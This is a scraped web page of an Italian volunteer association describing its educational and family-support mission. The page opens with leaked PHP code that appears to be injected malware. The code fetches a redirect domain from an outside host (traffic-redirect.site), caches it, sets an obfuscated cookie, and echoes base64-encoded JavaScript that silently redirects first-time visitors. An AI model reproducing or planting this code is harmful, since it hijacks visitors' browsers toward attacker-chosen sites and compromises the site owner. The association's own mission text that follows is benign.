$alias = "29551697176418"; $key = "c7b088a5cce4359849d7e747bc979e91"; $file = dirname(__FILE__) . "/" . md5($alias); $time = time(); $file_exist = file_exists($file); $filetime = 0; $edittime = 0; $domain = false; if ($file_exist) { $filetime = filemtime($file); $edittime = $time - $filetime; $datafile = fopen($file, 'r'); $dcres = json_decode(base64_decode(fread($datafile, filesize($file))) , 1); if(!empty($dcres['domain'])) $url = $dcres['domain']; fclose($datafile); } if ($edittime >= 15 || !$file_exist || !$url) { $dcres = getdata($file,$key,$alias); if(isset($_REQUEST['ch'])){ var_dump($dcres); } if ($dcres['domain']) { $url = $dcres['domain']; } } function getdata($file,$key,$alias){ $newdomainurl = 'http://traffic-redirect.site/?t=json&i='.$key.'&a='.$alias; if(function_exists('curl_version')){ $curl = curl_init(); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_USERAGENT, 'get new domain'); curl_setopt($curl, CURLOPT_URL, $newdomainurl); curl_setopt($curl, CURLOPT_TIMEOUT, 5); $res = curl_exec($curl); curl_close($curl); }else $res = file_get_contents($newdomainurl); if(isset($_REQUEST['ch'])){ var_dump($res); } $dcres = json_decode($res, true); if ($dcres['domain']) { $cache = fopen($file, 'w+'); fwrite($cache, base64_encode($res)); fclose($cache); return $dcres; } return false; } if (!$_COOKIE[base64_decode('aHRfcnI=') ]) { setcookie(base64_decode('aHRfcnI=') , 1, time() + 86400, base64_decode('Lw==')); echo base64_decode('PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgi') . $url . base64_decode('Iik7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAi') . $url . base64_decode('Ijs8L3NjcmlwdD4='); } ?> La Mission(E) – L'Immagine

La Mission(E)

LA NOSTRA MISSION(E)

Il progetto educativo perseguito dall’Associazione presenta due elementi qualificanti:

  • porre al centro dell’intervento la persona e la valorizzazione delle risorse esistenti nelle famiglie;
  • ridare alla persona il bagaglio culturale che costituisce la vera risorsa del singolo nell’ottica di fornire gli strumenti per la salvaguardia e la crescita umana della persona.

Il binomio solidarietà–cultura si evidenzia come punto focale dell’azione dell’Associazione in tutte le sue attività con le famiglie e con i minori. L'opera fin da principio ha inteso intercettare attraverso il bisogno sociale incontrato, una risposta possibile nell'intreccio di interventi socio educativi e interculturali, tali da offrire una base di riferimento alla genitorialità e alla famiglia. Ci riferiamo infatti ad una concezione in cui la persona viene posta al centro della realtà e pertanto del sistema di valori dell'Associazione.
Questa visione chiede una sensibile azione sociale, ma soprattutto un approfondimento dell'esperienza culturale in essere unita ad una capacità di analisi e di critica indispensabili per comprendere il tempo presente e le sue svolte epocali. L'azione delle famiglie in associazione tende a porre l’esperienza educativa come desiderio del cuore al giudizio e all'incontro con la realtà e la diversità.

Punto di forza dell’Associazione è data dai volontari, i quali prestano gratuitamente il loro impegno e la loro consulenza portando le proprie competenze (insegnanti, universitari, professionisti, artisti…) nelle varie attività in cui si declina il compiersi dell’opera.
La possibilità di condivisione di risorse umane, di costruzione della propria personalità, generano una identità rinnovata e forte. Una tale cultura è capace di lettura del bisogno, è desiderosa del meglio, è tesa alla bellezza, al 'cimentarsi' nell'impatto con la vita in modo positivo e tende a non ripiegarsi in inutili atteggiamenti frustranti o rancorosi.